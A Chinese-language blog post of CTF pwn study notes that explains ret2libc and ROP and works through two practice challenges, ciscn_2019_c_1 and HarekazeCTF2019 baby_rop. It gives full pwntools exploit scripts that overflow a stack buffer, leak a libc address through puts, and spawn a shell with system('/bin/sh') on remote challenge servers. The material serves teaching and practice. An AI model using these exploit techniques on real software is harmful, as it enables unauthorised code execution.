summer14

pwn刷题笔记(ret2libc、ROP)

ciscn_2019_c_1  (ret2libc + rop)

checksec查看保护机制,开启了NX,不能往栈里写入shellcode。

encrypt函数反汇编

encrypt(){
    char s[50];
    puts(Input your Plaintext to be encrypted)
    gets(s);
    if strlen(strlen(s) < x )
    {
        puts("ciphertext")
        puts(s)
        return 0;
    }
    else 做加密
}

encrypt函数,如果输入的字符串大小小于x(x是运行过程中才赋值的),那么就退出。否则encrypt就会做一系列的加密操作,更改输入的字符。绕过加密,只需输入的第一个字符为'\0'即可。

可以发现在encrypt函数存在缓冲区溢出漏洞,但是开启了NX,考虑ROP。

 

ida查看字串,没有"system"和'/bin/sh',说明程序没有调用system函数。

再看.plt段,也没有system,但存在puts函数的.plt项。

没有libc文件,需要获取libc版本

利用思路如下:函数执行过程中获取到puts函数真实地址后,根据puts函数真实地址相对于在libc的偏移,计算出system函数和‘/bin/sh’字符串的真实地址,用到如下知识点:

libc.so 动态链接库中的函数之间相对偏移是固定的。
每个函数从libc映射到真实地址的偏移都是相等的。

先回顾下plt和got的知识

  延迟绑定机制:函数在第一次执行时才去寻找真实地址

  got表保存程序运行时的真实地址,plt实现延迟绑定。

  程序调用函数时,plt表先去找got表,看got表用没有记录函数真实地址。如果没有,plt去公共plt调用_dl_runtime_resolve 函数获取函数地址,并保存在got表中。

  plt表对应的是一系列指令;初始时,got表中存放的是plt下一条指令的地址

 

整理漏洞利用所需条件:

  输入第一个字符为'\0'

  puts函数在程序执行过程中的真实地址  

  puts函数真实地址相对于在libc.so的偏移

第一次栈溢出获取puts的真实地址,并计算出system和‘/bin/sh’的真实地址

第二次栈溢出执行system('/bin/sh')

 

第一次栈溢出:控制程序执行如下操作

  通过puts@plt表查找puts函数真实地址,并存放在got表中:puts_plt(puts_got);

  回到main函数,为第二次溢出做准备。

因此payload需要控制栈结构如下:

  

使用ROPgadget命令获取pop edi;ret的gadget,地址为:0x0000000000400c83

main函数地址为0x0000000000400B28

为什么pop edi

不同于ELF x86使用栈传递参数的方式,ELF x64参数使用寄存器传递,多余的参数才使用栈传递。
前六个整数类型参数分别存放在:rdi, rsi, rdx, rcx, r8, r9
前八个浮点数类型参数分别存放在:xxm0 - xxm7

  

第二次栈溢出控制程序执行system('/bin/sh')

payload需要控制栈结构如下:

  

添加ret指令是为了使栈平衡(16字节对齐)https://blog.csdn.net/qq_41560595/article/details/112161243

 完整代码

!/usr/bin/env python3
from pwn import *
from LibcSearcher import *

elf = ELF("./ciscn_2019_c_1")

rdi_gadget = 0x400c83
puts_plt =  elf.plt["puts"]
puts_got = elf.got["puts"]
main_ad = 0x400B28

#io = process("./ciscn_2019_c_1")
io = remote("node4.buuoj.cn", 25943)

#获取puts函数真实地址 io.sendlineafter(
"choice!\n", b"1") payload = b'\0' + b'a' * 0x4F + p64(0x1234) + p64(rdi_gadget) +p64(puts_got) + p64(puts_plt) + p64(main_ad) io.sendlineafter("Input your Plaintext to be encrypted\n", payload) print(io.recvline()) print(io.recvline()) #rec = io.recvuntil('\n') puts_addr = u64(io.recv(6).ljust(8, b'\x00')) print(puts_addr)
#计算system函数和字符串“/bin/sh”的真实地址 libc
= LibcSearcher("puts", puts_addr) offset = puts_addr - libc.dump('puts') system_addr = offset + libc.dump('system') binsh_addr = offset + libc.dump('str_bin_sh') print(f'offset:{offset} system_address:{system_addr} binsh_address:{binsh_addr}')
#执行system("/bin/sh") ret_gadget
= 0x4006b9 io.sendlineafter("choice!\n", b'1') payload = b'\0' + b'a' * 0x4F + p64(0x1234) + p64(ret_gadget) + p64(rdi_gadget) + p64(binsh_addr) + p64(system_addr) io.sendlineafter("be encrypted\n", payload) io.interactive()

 

[HarekazeCTF2019]baby_rop

 checksec查看保护机制,开启了NX。

 ida查看汇编代码

  

 写出对应反汇编代码

char input[0x10];
system("echo -n \"What's your name? \"");
scanf("%s", &input);
printf(""Welcome to the Pwn World, %s!\n"", input)

 存在缓冲区溢出,且开启了NX,使用ROP。

 由ida可知,“/bin/sh”地址:0x601048; system plt地址:0x400490

 ROPgadget得到pop rdi指令地址:0x400683

 构造栈如下:

  

写出利用代码

#!/usr/bin/env python3

from pwn import *

system_addr = 0x400490
binsh_addr = 0x601048
rdi_gadget = 0x400683

io = remote("node4.buuoj.cn", 29985)

payload = b'a' * 16 + p64(0x1234) + p64(rdi_gadget) + p64(binsh_addr) + p64(system_addr)
io.sendlineafter("What's your name? ", payload)
io.interactive()

 

posted on 2023-04-27 22:42  summer14  阅读(236)  评论(0编辑  收藏  举报

导航